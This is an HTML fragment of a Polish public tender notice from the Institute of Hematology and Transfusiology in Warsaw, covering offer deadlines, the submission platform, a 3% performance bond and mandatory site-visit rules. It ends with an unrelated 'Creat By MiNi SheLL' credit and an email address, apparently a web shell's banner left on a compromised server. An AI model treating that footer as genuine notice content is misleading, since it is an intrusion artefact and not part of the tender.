PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-01-19 09:15</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://ihit.ezamawiajacy.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-01-19 09:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-02-19</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Przed podpisaniem umowy – najpóźniej w dniu podpisania umowy Wykonawca zobowiązany jest, w celu zabezpieczenia roszczeń Zamawiającego z tytułu niewykonania lub nienależytego wykonania umowy, wnieść zabezpieczenie należytego wykonania umowy zgodnie z art. 452 ust. 2 ustawy <br/>w wysokości 3% wartości brutto umowy (po zaokrągleniu w górę do pełnych złotych). Więcej informacji znajduje się w rozdziale XXIV.<br/>1.	W celu prawidłowego przygotowania oferty oraz oszacowania kosztów realizacji zamówienia Zamawiający, ze względu na specyfikację przedmiotu zamówienia zgodnie z art. 281 ust. 2 pkt 12 ustawy Pzp umożliwia dokonanie wizji lokalnej. Wizja lokalna będzie mogła mieć miejsce w dni robocze, od poniedziałku do piątku w godzinach 9:00 – 11:00 po wcześniejszym ustaleniu terminu z Zamawiającym przed terminem wyznaczonym na składanie ofert. <br/>2.	O dokonanie wizji lokalnej należy zwracać się z wnioskiem, przesłanym elektronicznie przy użyciu Platformy Zakupowej Zamawiającego dostępnej pod adresem: https://ihit.ezamawiajacy.pl. We wniosku należy wskazać osobę, która będzie uczestniczyła w wizji lokalnej. <br/>3.	Zebranie zainteresowanych wykonawców odbędzie się przed budynkiem Instytutu Hematologii <br/>i Transfuzjologii w Warszawie, ul. Indiry Gandhi 14, 02-776 Warszawa<br/>4.	Wszystkie osoby, które przybędą na spotkanie zobowiązane są do pisemnego potwierdzenia swojej obecności na liście uczestników przygotowanej przez Zamawiającego.<br/>5.	Nieskorzystanie z możliwości odbycia wizji lokalnej wyklucza ewentualne roszczenia Wykonawcy z tytułu błędnego skalkulowania ceny.<br/>6.	Zgodnie z art. 226 ust. 1 pkt. 18 ustawy Pzp, odrzuceniu podlegać będzie oferta, która została złożona bez odbycia wizji lokalnej.<br/>7.	Koszt wizji lokalnej ponosi Wykonawca.<br/>8.	Prowadzenie jakichkolwiek ustaleń podczas wizji nie jest wiążące. Wszelkie merytoryczne pytania należy kierować do Zamawiającego zgodnie z przejętym przez Zamawiającego sposobem komunikacji o których mowa w rozdziale XV SWZ.

Creat By MiNi SheLL
Email: jattceo@gmail.com